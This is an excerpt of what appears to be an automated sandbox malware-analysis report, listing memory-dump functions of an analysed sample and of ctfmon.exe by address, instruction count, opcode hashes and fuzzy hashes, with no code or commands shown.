Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d0bfe2b310a6e7b490b5d76ae8b9f87c1c8cf8b5b5ebc9bdafb7604dde0a5e
Instruction ID: d8e7f00f45a19ad5d5ff79f395cc1241d98b51159cdd503eaa8f0227e1bc0cb5
Opcode Fuzzy Hash: d1d0bfe2b310a6e7b490b5d76ae8b9f87c1c8cf8b5b5ebc9bdafb7604dde0a5e
Instruction Fuzzy Hash: 10F0BB5272DA855FE755AA2CC4556E9B790FB54200B4086BAD04FCB9C2DF25E4084781

Function 00007FFAACBD8D38 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220018b723baaebb9262b22a27bed6867ba8d8d8018cc4478c1bdf8393f6f34e
Instruction ID: a2634362c0e1baa2058a8523891397de371ab980d0fc1f7a5699df5a456058f7
Opcode Fuzzy Hash: 220018b723baaebb9262b22a27bed6867ba8d8d8018cc4478c1bdf8393f6f34e
Instruction Fuzzy Hash: A6F05E2190F967CAFA675B54D4523B93A82AF23352F20897BC40ECE1D1DD2BB50942E2

Function 00007FFAAC80A9A9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60df3b6527f0d9dd468ec3d0f424802eae07954ee4ed86812a7ca17e7c5628bb
Instruction ID: 942f33cbc47fef8f0513c0d77172cb94f68830b1f47eab3ccccc5bff178fd106
Opcode Fuzzy Hash: 60df3b6527f0d9dd468ec3d0f424802eae07954ee4ed86812a7ca17e7c5628bb
Instruction Fuzzy Hash: E8F0E531708B844FC729963D84A5061BFF1DF9B10534A42EFC097C76A3DD58EC8A8741

Function 00007FFAAC80E3A9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3dfc7d22902dd2c94ef4849076f22b685bd60d25e7948cad509968f07700cdd
Instruction ID: b9e077f11bbed8806e8e4eecd1982f48cdeffca7975b192e2005d49ed37ed2c8
Opcode Fuzzy Hash: e3dfc7d22902dd2c94ef4849076f22b685bd60d25e7948cad509968f07700cdd
Instruction Fuzzy Hash: A6F09030E09929DFEB85EB1890547AA72D2FB8D300F4082B5D01DC32C5CF78B80947C6

Function 00007FFAAC814B4E Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb7d3c774648a153e88341cc4c0f13a7af16b5879725c2d6b5088f4707eff11
Instruction ID: 8755f9cd3430b626c87ddc7586a53e3211929a18eacadf67a3bfa715df9861c8
Opcode Fuzzy Hash: 8fb7d3c774648a153e88341cc4c0f13a7af16b5879725c2d6b5088f4707eff11
Instruction Fuzzy Hash: 7EF0E521E1D91E8AFB689B68842537D52D2FBCD612F1082BEE44FD31C1DF18AD0543C0

Function 00007FFAAC802F49 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7861754f645593aa0d783299d28ba15fe42080e947bc33ca9b1283cb7079aed2
Instruction ID: 27e75c80bf382ca7263c4fc17febce65c18308e3f08202878b6356b2b39d01dd
Opcode Fuzzy Hash: 7861754f645593aa0d783299d28ba15fe42080e947bc33ca9b1283cb7079aed2
Instruction Fuzzy Hash: DBE0922160AB884FC70E963948685507FB1EB6B11138942DBC045CB2A3DD19DC89C751

Function 00007FFAAC80EA70 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701e262446fe2f2a3ab9be7b2b102cf9eb025c29d560df8e4464683b32540f63
Instruction ID: b9e44928ccd85683040ef50dbf14f972ba83fbb9f8168bd7cad0a908b914e8d5
Opcode Fuzzy Hash: 701e262446fe2f2a3ab9be7b2b102cf9eb025c29d560df8e4464683b32540f63
Instruction Fuzzy Hash: 2EE0D87191AB4C9BEB94AB59A8056D97BA0FF9E314F0400BAE01DC7181D6259945C392

Function 00007FFAAC803749 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42040a2339206b13386d45dd706272615576ecbc2acf5f03680c1a024dfb4f9d
Instruction ID: bb2b679ff924c757b35881c1c936c411e3e890c41c4c834913094530e3f2e612
Opcode Fuzzy Hash: 42040a2339206b13386d45dd706272615576ecbc2acf5f03680c1a024dfb4f9d
Instruction Fuzzy Hash: 23E0D820B597854FC70DA63C8854060BBB1EF6721279552EBC045CB293EA29DC8AC741

Function 00007FFAAC80A4F9 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff9e1e26fe90373f135458edd3ca993731531980d5a9e4e66a30d9eccfeb8d25
Instruction ID: 868d4560d620cf474637c16001f8f4531ed32c276b996a53a4ddcf78a48e169d
Opcode Fuzzy Hash: ff9e1e26fe90373f135458edd3ca993731531980d5a9e4e66a30d9eccfeb8d25
Instruction Fuzzy Hash: 5FE09B20709B854FC70D673C48284607BB1EF6A10274502DBC045CB1A3D919DC84C741

Function 00007FFAAC801C89 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f28b0fe6df0a8c3ac351040652f4d8a9d7dc06c14359f33ab74c56c69a63c2
Instruction ID: b38786e3d9ce5354772df1209eb294a7b3b34466083f5759c2e2b4528b1436c9
Opcode Fuzzy Hash: 29f28b0fe6df0a8c3ac351040652f4d8a9d7dc06c14359f33ab74c56c69a63c2
Instruction Fuzzy Hash: A2E09220A197854FC709A63C8828020BBB1EF6B21278912EFC045CB2A3EA28DC85C741

Function 00007FFAAC80A429 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae29c3156499e9451fb7c16e795b00869852fe3ea6af38682977d5a90682e51
Instruction ID: 4d7c73399670eb351dc1d41fa26949e5a9a187b3a49254ac237ab77ddea1d023
Opcode Fuzzy Hash: 6ae29c3156499e9451fb7c16e795b00869852fe3ea6af38682977d5a90682e51
Instruction Fuzzy Hash: 10E09221709B854FC70DA72C88284607BB1EB6A20278902EBC049CB2A3EA29DC88C741

Function 00007FFAAC80A9C0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
Instruction ID: e28ce4173a8e412c5bea0b82bd9e50c8deab70beb668483cf558c0399b989dd2
Opcode Fuzzy Hash: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
Instruction Fuzzy Hash: 5DD02B30760F0C074B2CA52E6445471B3D5C79E206344427E945BC3394DC50EC8247C4

Function 00007FFAAC807D69 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d79979a544a8eadcab179ede87a8cad9695ff4606c2826ee9ef3a5631be701
Instruction ID: 82244105c9379088c26499f8ad901a383beccb7eb35a946718a3896e7445e4c5
Opcode Fuzzy Hash: d7d79979a544a8eadcab179ede87a8cad9695ff4606c2826ee9ef3a5631be701
Instruction Fuzzy Hash: A7E04F2161AB808FC70AA73888699507FB0EF7B211B4A41EBD045CB1B3E62DD848C742

Function 00007FFAAC80A510 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFAAC803760 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FFAAC80A440 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFAAC817868 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c00dfd01a91dc56ece5ef144b1dd3bd5d61303922a694b9283892e2fae4b30
Instruction ID: 173c5db0256da38b3e314466e2d333c1c1bc37f7e711e2e1e9654f7a2ebe9398
Opcode Fuzzy Hash: 40c00dfd01a91dc56ece5ef144b1dd3bd5d61303922a694b9283892e2fae4b30
Instruction Fuzzy Hash: EED05E2071190C4B8B4CA62C885847072D1E7692167A441AD900EC6291ED16E88A8740

Function 00007FFAAC8078D9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f03ba3885bbf84696acf1668333cc3653c5a5c6422692d22788bd9eb224d5c6
Instruction ID: e5c52558ca5dfd014624f4081b7eadcd1b74001a9df78b84aceba9c5aca38f50
Opcode Fuzzy Hash: 8f03ba3885bbf84696acf1668333cc3653c5a5c6422692d22788bd9eb224d5c6
Instruction Fuzzy Hash: CEE04F6194F7C08FC74B973488B88407F60EE6B21178A40EEC149CF1B3D61D9949C742

Function 00007FFAAC813FA0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 164ba7b1977543abfcc6a81a7c9a7ad1408882b82cb4321c0f0410f491fb86b2
Instruction ID: efa8fd73a7f4f87aa3e3606fc77548c72903e7b6254aa1f954d095ed202c08ac
Opcode Fuzzy Hash: 164ba7b1977543abfcc6a81a7c9a7ad1408882b82cb4321c0f0410f491fb86b2
Instruction Fuzzy Hash: 68D0C730651D044F8B4CF72C885996472D1E76D21679540A9D01EC71A1E955E849C741

Function 00007FFAAC817840 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d816c856ac6fd8b8c812c44dec72e0d8245957321314f16d99af5916f64009a8
Instruction ID: c0b3bff13ed1d0db541ba2f9c63ebdc053440baa2b929ae0f224a09953d994f1
Opcode Fuzzy Hash: d816c856ac6fd8b8c812c44dec72e0d8245957321314f16d99af5916f64009a8
Instruction Fuzzy Hash: AED01230B61D088F8B4CF73D885997073E1FB6E21679540E9D00EC72B1E96AEC89C781

Function 00007FFAAC807D80 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFAAC801D30 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFAACBD3437 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9e8591c3eb2af48b4f3a717cff9a94e0bec2c9d77431c0eb1481d9eab402d5
Instruction ID: 445f83bda3d372148b8adc58594ace7232ae3628b550bec002acea09e53767fb
Opcode Fuzzy Hash: dd9e8591c3eb2af48b4f3a717cff9a94e0bec2c9d77431c0eb1481d9eab402d5
Instruction Fuzzy Hash: 2DD0C251D0E3C2CFF717076888A02782E709F0B30171501B7D50D4E3C3D95DA80887A2

Function 00007FFAAC806E70 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction ID: eb581a6d1ce52630f432b73184ee5d034357b093b3424be7096a4cab1f145661
Opcode Fuzzy Hash: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction Fuzzy Hash: 1ED01234B519048F871CA7388C598747391FBAE217B9540A9D00BC72B2D96AEC89C781

Function 00007FFAAC7E48FD Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac7e0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa90a29e305fe821bada111ddc5005f10706fd753ff8886125b72888df011d23
Instruction ID: e2ddee5a2508a76d24a474851445297d5bd1d44dbe6280111864604fef366569
Opcode Fuzzy Hash: fa90a29e305fe821bada111ddc5005f10706fd753ff8886125b72888df011d23
Instruction Fuzzy Hash: 55D0C921A09E5BCFFA57EF189884BB922B1FF4B300F414476E81EC3196DE28E8558A41

Function 00007FFAAC7D1F58 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac7d0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 905443de75d5f5cf95f89da95b19c81fe186f36051fa2054e7afba1a66c12da1
Instruction ID: 922d93642caee8bcca5484e02302a21b66acfc009be5f446778c2b06b093ef6e
Opcode Fuzzy Hash: 905443de75d5f5cf95f89da95b19c81fe186f36051fa2054e7afba1a66c12da1
Instruction Fuzzy Hash: E2D01221E0D1278BFBA5A304D8417B96279DF95314F1090B9DA0ED32C1DD3CED884F85

Function 00007FFAAC7D25D6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac7d0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3bfd5defbea4e8f9eee49836262a4d138a79904963209321742c2dae315f6be
Instruction ID: 873eb9b16874e462d0404e254976001f9dc97277c620a47b5d9fdc49ed6bdb8d
Opcode Fuzzy Hash: f3bfd5defbea4e8f9eee49836262a4d138a79904963209321742c2dae315f6be
Instruction Fuzzy Hash: 53D0C910E0A54A8BFA86633480262BE16A19B86320F409476E80E8B3C2DC28AC490EC1

Function 00007FFAACBD3F1B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0320fddf887d4cb9f89a615ede717bb0e45e7e2153b953a923008933622dd8
Instruction ID: f53316803d5e560e02a3943da203c7b7d76a74c3c84cfc49acec5ad239b2c898
Opcode Fuzzy Hash: dc0320fddf887d4cb9f89a615ede717bb0e45e7e2153b953a923008933622dd8
Instruction Fuzzy Hash: F0D09214A1FAABC5F96A4705C1603B965B06F56301E20983BD05F499C2CD1FF5096682

Function 00007FFAACBD6AB5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: 5e75d72ae6e9c63023c6c569fcdcce703503bd89d95babd04dbabe6ee0fe48f1
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: 39C04C30204914DFDB84DB4DC0D473873D1EF5E301B5044B5E04ECF2A5C529DC499710

Function 00007FFAAC8174E8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f13a87583d674c66cdd24711753ccf533da8abb78fab1cd486ea7a59b406130
Instruction ID: 59a75438a9c2b28f650948517dd063719b59893952fdf44aa4a79e30a37e3b03
Opcode Fuzzy Hash: 0f13a87583d674c66cdd24711753ccf533da8abb78fab1cd486ea7a59b406130
Instruction Fuzzy Hash: F9B09220C57606C5E9283B3148420A47090BB0B214FE045F8D50C42285E86EA09982C2

Function 00007FFAAC812C50 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40a62cc88bae76dffd9c8223891e9e866366a6f77136b26caaeab115c3a57817
Instruction ID: 7e0d0d8ce770a99ebe4f90046d9d4bf4f5e49f0ab20a9b63a81773f091cf7e78
Opcode Fuzzy Hash: 40a62cc88bae76dffd9c8223891e9e866366a6f77136b26caaeab115c3a57817
Instruction Fuzzy Hash: 99B09220C57A0AC2EA28373208820A47490BB0F209FD159F8E40C4529199AEA09942C2

Function 00007FFAACBD825C Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef72083d3f6c72fed3503d18d3a9e003eb5982391137b2c8576c1155365f1ef
Instruction ID: 8991266dae9c29d50097c3e5b9e0c3d65040e6b61abc18739a3ccad20a8e83d7
Opcode Fuzzy Hash: 3ef72083d3f6c72fed3503d18d3a9e003eb5982391137b2c8576c1155365f1ef
Instruction Fuzzy Hash: 1BC01240E0E2428BFA2283A0888403C27A05F0B2027404272C10A8A183E81AA8084AE0

Function 00007FFAAC7D2D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac7d0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: 418c62bdd62d962657d3243a815e604849c95374a732a90c98d20eaf7c3b4583
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Analysis Process: ctfmon.exePID: 7308, Parent PID: 3180COMMON

Executed Functions

Function 00007FFAAC7C0D47 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FFAAC7C0DF3

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 8cdcd9a502bded21922bc76755df1621d97bfbc57be7b1503393340382b14026
Instruction ID: aa6052b1ea2f7ceefb9a97da0575ea01537aff62ccf4992bc20b68e807096006
Opcode Fuzzy Hash: 8cdcd9a502bded21922bc76755df1621d97bfbc57be7b1503393340382b14026
Instruction Fuzzy Hash: 3A91E5B191DA8A8FF78ADB68C8597A87FF1FF56310F1041BAC04DD76A2DAB85414C780

Function 00007FFAAC7C08D0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112f805ff0d2d86c052eaa07c67bc3119347ddb83d873cd4713a20fa36628793
Instruction ID: 764a9e5e0ea8b0cf2f52680a72da33b7f87b7e9e92b08b6a9141c041d0a30fc2
Opcode Fuzzy Hash: 112f805ff0d2d86c052eaa07c67bc3119347ddb83d873cd4713a20fa36628793
Instruction Fuzzy Hash: 62412823A0C55A5BF729B77CE09AAF87791DF45326B0485BBD44EC72A3CD18A84282C4

Function 00007FFAAC7C0998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

